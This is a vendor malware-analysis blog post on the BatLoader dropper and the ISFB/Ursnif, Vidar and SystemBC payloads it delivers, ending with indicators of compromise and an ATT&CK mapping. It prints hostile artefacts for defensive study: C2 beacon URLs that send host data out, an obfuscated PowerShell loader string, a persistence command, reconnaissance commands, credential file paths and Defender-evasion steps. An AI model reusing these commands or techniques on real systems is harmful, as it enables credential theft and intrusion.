Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT In recent weeks, eSentire’s Threat Response Unit (TRU) has traced numerous email account compromise cases to infrastructure hosted on several related hosting…
Dec 10, 2024THE THREATUpdate: Security patches to address this vulnerability were released by Cleo on December 12th. Organizations need to update to Cleo Harmony, VLTrader, and LexiCom versions…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Since being introduced in February 2022, BatLoader is a malware dropper that has been observed dropping several well-known malware or malicious tools like ISFB, SystemBC RAT, Redline Stealer, and Vidar Stealer. Since its MSI installer file size is 100MB+, BatLoader can easily evade most sandboxes and antivirus tools.
This malware analysis delves deeper into the technical details of how the BatLoader malware operates and our security recommendations to protect your organization from being exploited.
In September 2022, eSentire TRU observed multiple BatLoader infections in Consumer Services, Retail, Telecommunications, and Non-Profit client environments. The initial infection starts with the user searching for installers such as Zoom, TeamViewer, AnyDesk, or FileZilla. The user navigates to the first advertisement displayed, which redirects the user to the website hosting the fake installer. The MSI installers are signed by “Kancelaria Adwokacka Adwokat Aleksandra Krzemińska” (Figures 1-2).
In October and November 2022, we observed the second BatLoader campaign pushing fake installers such as TeamViewer (Figure 3), AnyDesk and LogMeIn. The infections were observed in Insurance, Consulting, Healthcare, and Printing industries.
We also observed several C2 domains related to BatLoader campaigns:
BatLoader, named by Mandiant, is a malware dropper. The malware was first mentioned by Mandiant in February 2022. It’s worth noting that Mandiant mentioned the domain clouds222[.]com for the BatLoader campaign which also overlaps with the Zloader C2 domain.
eSentire TRU observed BatLoader dropping the following malware / malicious tools:
The MSI installer file is over 100MB in size; the large file size is implemented by threat actor(s) to evade sandboxes and antivirus products. The properties of the BatLoader MSI installer are shown in Figure 5. Within the MSI file, we have found the components of NovaPDF 11 (Figure 6) and other garbage files shown in Figure 7. The files reside within the C:\Program Files (x86)\Softland\novaPDF 11\Tools path that is created after the malicious MSI is successfully run, we also found NordVPNSetup.exe dropped within the same path. We believe that the files mentioned are used as a decoy.
The main malicious trigger for the MSI installer resides under CustomAction table. Custom Actions are the operations defined by the user during installation or MSI execution. The malicious actor(s) create a custom action to run the malicious PowerShell inline script. The malicious script resides under AI_DATA_SETTER action name and contains the instructions to download the malicious update.bat file from the C2 domain and place it under AppData\Roaming folder (Figure 8). The PowerShell script is run via the PowerShell Core or pwsh.exe in a hidden window.
The downloaded update.bat file is responsible for downloading requestadmin.bat file and NirCmd.exe binary (Figure 9).
The requestadmin.bat is responsible for performing antivirus tampering – adding %APPDATA% and %USERPROFILE%\ paths to Windows Defender exclusion to prevent Defender from scanning the mentioned paths. The batch file was executed via nircmd.exe which was also downloaded from the C2; the utility allows the batch file to run in the background without displaying the user interface. Besides excluding the paths, the batch file also retrieves and executes the runanddelete.bat and scripttodo.ps1 scripts from the C2 via a native PowerShell command Invoke-WebRequest (Figure 10).
The scripttodo.ps1 installs the GnuPg, the software that encrypts and signs the data and communications as shown in Figure 11.
Further down, the script enumerates the current domain that the user is logged into, the username, and obtains all entries within the IPs starting with 192., 10., and .172 in the ARP cache table. Once it completes that task, it then checks the amount of IPs found in the ARP table and completes a sum operation.
The requests to the C2 server are performed in the following format:
https://<C2 Server>/g5i0nq/index/d2ef590c0310838490561a205469713d/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname
https://<C2 Server>/g5i0nq/index/fa0a24aafe050500595b1df4153a17fb/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname
https://<C2 Server>/g5i0nq/index/i850c923db452d4556a2c46125e7b6f2/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname
https://<C2 Server>/g5i0nq/index/b5e6ec2584da24e2401f9bc14a08dedf/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname
If the mentioned conditions are not satisfied, the script retrieves the GPG-encrypted files:
If all the conditions are met, the script retrieves the following files:
We were unable to retrieve the shutdowni.bat file but we believe the script might have been deployed to restart the host.
The GPG decryption routine was borrowed from the script hosted on GitHub (Figure 13). The script looks for files ending with gpg in %APPDATA% folder and decrypts them using the password 105b.
Moreover, the scripttodo.ps1 recursively removes the implementation of Windows Defender IOfficeAntiVirus under HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}. The IOfficeAntivirus component is responsible for detecting malicious or suspicious files downloaded from the Internet. It then adds the extensions such as exe and DLL as exclusions to Windows Defender. Additionally, the script downloads Nsudo.exe tool to be able to run files and programs with full privileges.
We have mentioned that besides scripttodo.ps1, the runanddelete.bat (Figure 14) file was retrieved. The batch file is responsible for running a malicious executable d2ef5.exe with administrator privileges by creating a VBS script getadmin.vbs under %TEMP% folder to run the binary, but first the user would get an alert prompt from User Account Control (UAC) to allow the program to make changes.
The binary d2ef5.exe is the ISFB banking malware also known as the successor of Gozi or Ursnif. The first Gozi variant was first discovered by SecureWorks in 2007 and is still active today, spreading through phishing emails and loaders. The Ursnif version we observed can exfiltrate browser credentials and cookies, Thunderbird and Outlook profiles, POP3, SMTP passwords. The strings “*terminal* *wallet* *bank* *banco*” were also observed which suggests that Ursnif is also capable of stealing cryptocurrency from digital wallets and banking credentials.
Upon execution, ISFB creates a persistence via Registry Run Keys under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. The registry value VirtualStop (the registry values can be different based on the wordlist table hardcoded in the binary). The registry value contains the command that launches the shortcut (LNK) which contains powershell.exe in the relative path. The PowerShell starts the CollectMirrow.ps1 script under %USERPROFILE% folder bypassing the PowerShell’s execution policy.
The command execution example:
cmd /c start C:\Users\<username>\VirtualStop.lnk -ep unrestricted -file C:\Users\<username>\CollectMirrow.ps1
The CollectMirror.ps1 script contains the PowerShell one-liner (Figure 15) that pulls the written data from the registry under HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\<registry_value>>, specifically the TestMouse value (Figure 16).
The script performs process injection using the API such as OpenThread (to create a handle to an existing process), VirtualAlloc (memory allocation in the chosen process), and QueueUserAPC, the thread that the APC (Asynchronous Procedure Calls) is queued to has to enter an alertable state, this can be achieved by invoking SleepEx as shown in Figure 17.
We have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB (MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5).
We have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB (MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5). You can read the very well-written analyses by Daniel Bunce here and here, but we will cover the main basics of malware.
The payload locates the BSS section which is where the encrypted strings reside within the function shown in Figure 18 (the hex string 81 38 2E 62 73 73 contains ‘bss’).
The data stored in the BSS section is encoded as shown in Figure 19.
The decryption function is shown below, the decryption function can be represented as the following pseudocode:
The decryption function takes 4 bytes of the encrypted data in BSS at a time and converts them into an integer, then subtracts the key from the index value and adds to the DWORD value which is 4 bytes.
The decompiled code can be seen in Figure 21. The decryption function is thoroughly described by 0verfl0w (Daniel Bunce) here. Part of the key is derived from the division operations from the value retrieved from API call GetSystemTimeAsFileTime (retrieving system time). Another part of the key is embedded in our payload which is 0x81b8e7da. Applying the key to the decryption function (Figure 22) and part of the key derived from system time (which is 19) gave us the decrypted data (Figure 23).
The second decompressed data blob contains the following:
C2: trackingg-protectioon.cdn1.mozilla[.]net, 45.8.158[.]104, trackingg-protectioon.cdn1.mozilla[.]net, 188.127.224[.]114, weiqeqwns[.]com, wdeiqeqwns[.]com, weiqeqwens[.]com, weiqewqwns[.]com, iujdhsndjfks[.]com
Botnet ID: 10101
Server ID: 50
Key: T3H5l6EZGEh6GkB5
Directory: /uploaded
Extension: .dib, .pct (beacon extension)
Sleep time: 1 second
ConfigTimeout (time interval to check for a new configuration): 20 seconds
The third blob contains the wordlist values shown below:
['list', 'stop', 'computer', 'desktop', 'system', 'service', 'start', 'game', 'stop', 'operation', 'black', 'line', 'white', 'mode', 'link', 'urls', 'text', 'name', 'document', 'type', 'folder', 'mouse', 'file', 'paper', 'mark', 'check', 'mask', 'level', 'memory', 'chip', 'time', 'reply', 'date', 'mirrow', 'settings', 'collect', 'options', 'value', 'manager', 'page', 'control', 'thread', 'operator', 'byte', 'char', 'return', 'device', 'driver', 'tool', 'sheet', 'util', 'book', 'class', 'window', 'handler', 'pack', 'virtual', 'test', 'active', 'collision', 'process', 'make', 'local', 'core']
These words are used to build the registry value names.
Another interesting feature of the ISFB is that it stores three embedded binaries within the unpacked payload. The binaries are compressed using APLib compression algorithm. The decompression function is shown in Figure 24.
To be able to locate the embedded compressed binaries, we need to find the structure of the ISFB payload where it stores the configuration. The configuration contains the payload marker or header, XOR key, CRC32 hash, the offset, and the size of each compressed binary (Figure 25). The payload marker defines the version of ISFB.
FJ – old ISFB version
J1 – old ISFB version
J2 – DreamBot version
J3 – ISFB v3 Japan
JJ – ISFB v2.14 and above
WD – RM3
The compressed data is separated by the null bytes as shown in Figure 26. You can see something resembling C2 domains in the first blob.
We wrote a Python script to extract the compressed data and decompress them (Figure 27). The first compressed blob contains the RSA public key with the hash 0xe1285e64 (Figure 28).
ISFB also stores the configuration within the function that parses the payload header (Figure 29). The hash values are calculated by XORing the value 0x69b25f44 (known as g_CsCookie from the leaked code) with the values that match with CRC_CLIENT32 (again, from the leaked code).
The following are the hashes of the payload as a result of XORing:
0x11271c7f – timer
0x48295783 – timer
0x584e5925 – botnet
0x556aed8f – server
0x4fa8693e – key
0xd0665bf6 – domains
0x54432e74– directory
0xbbb5c71d – extension
The traffic beaconing contains the following pattern that will be encrypted with the AES key extracted from the compressed blob:
soft=%u&version=%u&user==%08x%08x%08x%08x &server=50&id=10101&crc=61f03b3&uptime=102696&action=%08x&dns=%s&whoami=%s&os=%s
soft, version – version of the payload
user – the value calculated from applying the RNG (Random Number Generator) algorithm, using the username, computer name, XOR operations, and cpuid call.
server – server ID
id – botnet ID
uptime – is the value based on the API calls QueryPerformanceFrequency and QueryPerformanceCounter
dns – computer name
os – OS version and system type
The example of the encrypted with AES-128 beacon, replacing + with _2B and / with _2F, the / are also being added:
/uploaded/V1jd62QM3JcPMZGTpdjl2I/mEcoduKcJlNZo/S1Tq0KYy/M2ZEZFPG3iasm8TVeZ5oYf7/m_2FHfl318/E2HneynLJsT2KcKW6/MBeMivC1RFEh/TAL8bLaLD_2/B1Hg1OTg4XQwlG/IJbZJIe0rxQ0SYwzWgYte/TfzvWXXywf9HHwRL/2ZSv_2BcgktHGaZ/hRo7dwwYV3D39_2Bmc/JmEz3Z359/UhGcxj4s_2F80Krry3Kf/tI6i_2BxIXB2d6WASfJ/NCIpYT61pYgL53jx8SghJH/pQnAADp6racXs/VdB_2FRy/o74GaLVJG9neXweATdYNR/5.pct
Some interesting strings found:
/data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
\Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
%APPDATA%\Mozilla\Firefox\Profiles
EnableSPDY3_0
\Macromedia\Flash Player\
cookies.sqlite
cookies.sqlite-journal
Mozilla\Firefox\Profiles
Microsoft\Edge\User Data\Default
Google\Chrome\User Data\Default
--use-spdy=off --disable-http2
Cmd %s processed: %u
Cmd %u parsing: %u
cmd /C "%s> %s1"
wmic computersystem get domain |more
systeminfo.exe
tasklist.exe /SVC >
driverquery.exe >
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >
cmd /U /C "type %s1 > %s & del %s1"
net view >
nslookup 127.0.0.1 >
nslookup myip.opendns.com resolver1.opendns.com
net config workstation >
nltest /domain_trusts >
nltest /domain_trusts /all_trusts >
net view /all /domain >
net view /all >
user_pref("network.http.spdy.enabled", false);
Software\Microsoft\Windows Mail
Software\Microsoft\Windows Live Mail
account{*}.oeaccount
Account_Name
encryptedUsername
SMTP_Email_Address
encryptedPassword
EmailAddressCollection/EmailAddress[%u]/Address
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
Account Name
IMAP Server
IMAP Password
IMAP Use SSL
POP3 Server
POP3 Password
POP3 Use SSL
SMTP Server
SMTP Password
SMTP Use SSL
%PROGRAMFILES%\Mozilla Thunderbird
%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
\logins.json
/C pause dll
cache2\entries\*.*
cmd /c start %s -ep unrestricted -file %s
new-alias -name %s -value gp;new-alias -name %s -value iex;%s ([System.Text.Encoding]::ASCII.GetString((%s "HKCU:\%s").%S))
ipconfig /all
file://c:\test\test32.dll
file://c:\test\tor64.dll
30, 8, *terminal* *wallet* *bank* *banco*
Man-in-the-browser is another capability of Ursnif. You might have noticed strings such as “user_pref("network.http.spdy.enabled", false);”, “EnableSPDY3_0” and “--use-spdy=off --disable-http2”. Ursnif disables SPDY and HTTP/2 (successor of SPDY protocol) on the infected host. The protocols allow HTTP data compression to achieve minimal latency. With the protocol implementation, threat actor(s) might have to spend additional time attempting to modify and intercepting the web traffic.
We still see some remanences from the Ursnif DreamBot in ISFB v2 (file://c:\test\tor64.dll), which might suggest that the Tor communication capability is still possible.
Botnet: 1259
Version: 54.7
C2: t[.]me/trampapanam, nerdculture[.]de/@yoxhyp
Upon successful infection, first, the host would reach out to the C2 and retrieve the DLLs (Dynamic Link Library) dependencies such as vcruntime140.dll, sqlite3.dll, softokn3.dll, nss3.dll, msvcp140.dll, mozglue.dll, freebl3.dll for the stealer to be able to extract credentials and cookies from browsers and to function properly. If you are interesting in understanding in more depth what each library is responsible for, you can review our blog on Mars Stealer.
The stealer then collects the credentials, host information, files, and screenshot and sends it over as a ZIP archive in a base64-encoded format as shown in Figure 30.
We are in the processing of completing a technical analysis of Vidar Stealer, which will be our next blog.
Syncro RMM is a Remote Monitoring and Management tool used to control and manage devices remotely. In the hands of a malicious actor, this tool can be used as a persistence mechanism and remote accessing.
SystemBC RAT also known as “socks5 backconnect system” (MD5: 8ea797eb1796df20d4bdcadf0264ad6c) is a malware that leverages SOCKS5 proxies to hide malicious traffic, it also has the capability of sending additional payloads to the hosts (Figure 31).
The RAT creates the mutex “wow64” with the “start” as an argument (“start” will also be used as an argument for the scheduled task command). If the mutex is not present – the RAT will reach out to the C2. The C2 configuration is shown below:
HOST1: 188.127.224.46
HOST2: hgfiudtyukjnio[.]com
PORT1: 4251
TOR: 0
If the mutex is present on the host, the instruction would proceed further to check the integrity level of the current malicious process, then it compares to the value 1000 which is SECURITY_MANDATORY_LOW_RID (low integrity level, SID: S-1-16-0), this means the process is restricted and has limited write permissions.
SystemBC is capable of executing scripts and commands retrieved from C2 such as ps1, bat, vbs, and exe (Figure 33).
The second campaign we observed is slightly different than the first one. The MSI installer (MD5: 099483061f8321e70ce86c9991385f48) with the signature “Tax In Cloud sp. z o.o.” does not come with an embedded PowerShell script. Instead, the installer pushes “avolkov.exe” binary to the infected machine and creates the registry key containing the path of the dropped binary which is AppData/Local/ SetupProject1 (Figure 34).
The avolkov.exe binary (MD5: d41e0fee0ec6c2e3da56a6dcf53607da) utilizes libcurl 7.85.0 which enables the data transfer with URL syntax for protocols such as HTTP/HTTPS, FTP, DICT, SMTP, IMAP, POP3, LDAP, acting as a potential backdoor and loader. The binary has the C2 embedded inside the binary from where it retrieves the newtest.bat file (Figure 35). The batch script is responsible for pulling additional BatLoader payloads and scripts from C2 such as:
The requestadmin.bat (Figure 36) retrieved from the second campaign is different compared to the first campaign. The threat actor(s) made sure to add more paths and folders to Windows Defender exclusion including %TEMP% and C:\Windows\* as well as adding .ps1 (PowerShell) extension to the exclusion list.
We observed that the script retrieves NSudo and modifies Windows UAC prompt behavior by allowing administrators to perform operations without authentication or consent prompts:
The script also no longer pulls runanddelete.bat file from the C2.
The scripttodo.ps1 file still retrieves the same files from the C2, the Cobalt Strike payload (d655) was changed to a DLL instead of EXE and shutdowni.bat is no longer pulled from the C2.
user.ps1 (Figure 37) is similar to scriptodo.ps1 in terms of enumerating the current domain of the host, username, and ARP table.
Interestingly enough, we have observed QakBot using the same ordinal name to run Cobalt Strike payloads.
Another new addition to BatLoader is the antivirus check script (checkav.ps1). The script checks the host against the list of antiviruses and sends it out to C2 server (Figure 38).
Later, threat actor(s) switched from externalchecksso[.]com to internalchecksso[.]com. The scripttodo.ps1 was also changed to ru.ps1 as well as the names for malicious binaries as shown in Figure 39.
Our Threat Response Unit (TRU) combines threat intelligence obtained from continuous research and security incidents to create practical outcomes for our customers. We are taking a full-scale response approach to ongoing cybersecurity threats by deploying countermeasures, such as:
Our detection content is supported by investigation runbooks, ensuring our 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures. In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
We recommend implementing the following controls to help secure your organization against BatLoader malware:
While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Name | Indicators |
BatLoader C2 | updatea1[.]com |
BatLoader C2 | externalchecksso[.]com |
BatLoader C2 | internalcheckssso[.]com |
Ursnif C2 | weiqeqwns[.]com |
Ursnif C2 > | wdeiqeqwns[.]com |
Ursnif C2 | weiqeqwens[.]com |
Ursnif C2 | weiqewqwns[.]com |
Ursnif C2 | iujdhsndjfks[.]com |
Ursnif C2 | trackingg-protectioon.cdn1.mozilla[.]net |
Ursnif C2 | 45.8.158[.]104 |
Ursnif C2 | 188.127.224[.]114 |
Ursnif C2 | siwdmfkshsgw[.]com |
Vidar Stealer | t[.]me/trampapanam |
Ursnif C2 | Ijduwhsbvk[.]com |
Vidar Stealer | nerdculture[.]de/@yoxhyp |
SystemBC C2 | hgfiudtyukjnio[.]com |
SystemBC C2(overlaps with Ursnif C2 ISP) | 188.127.224[.]46 |
Cobalt Strike C2 | 139.60.161[.]74 |
Redline C2 | 176.113.115[.]10 |
MITRE ATT&CK Tactic |
ID |
MITRE ATT&CK Technique |
Description |
MITRE ATT&CK TacticInitial Access |
IDT1189 |
MITRE ATT&CK TechniqueDrive-by Compromise |
DescriptionBatLoader is delivered via fake software installers |
MITRE ATT&CK TacticUser Execution |
IDT1204.002 |
MITRE ATT&CK TechniqueMalicious File |
DescriptionThe user launches the malicious MSI file |
MITRE ATT&CK TacticPersistence |
IDT1547.001 |
MITRE ATT&CK TechniqueBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
DescriptionAs a result of BatLoader infection, ISFB malware creates the persistence via Registry Run Keys. Syncro RMM can also be used as a persistence mechanism |
MITRE ATT&CK TacticDefense Evasion |
IDT1562.001 |
MITRE ATT&CK TechniqueImpair Defenses: Disable or Modify Tools |
DescriptionDisabling Windows Defender notifications, Task Manager and Command Prompt |
MITRE ATT&CK TacticProcess Injection |
IDT1055 |
DescriptionISFB injects itself into explorer.exe as a result of successful BatLoader infection |
|
MITRE ATT&CK TacticUnsecured Credentials |
IDT1552.001 |
MITRE ATT&CK TechniqueUnsecured Credentials: Credentials In Files |
DescriptionThe ISFB version observed is capable of accessing browser credentials and cookies, Thunderbird and Outlook profiles, POP3, SMTP passwords. |
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.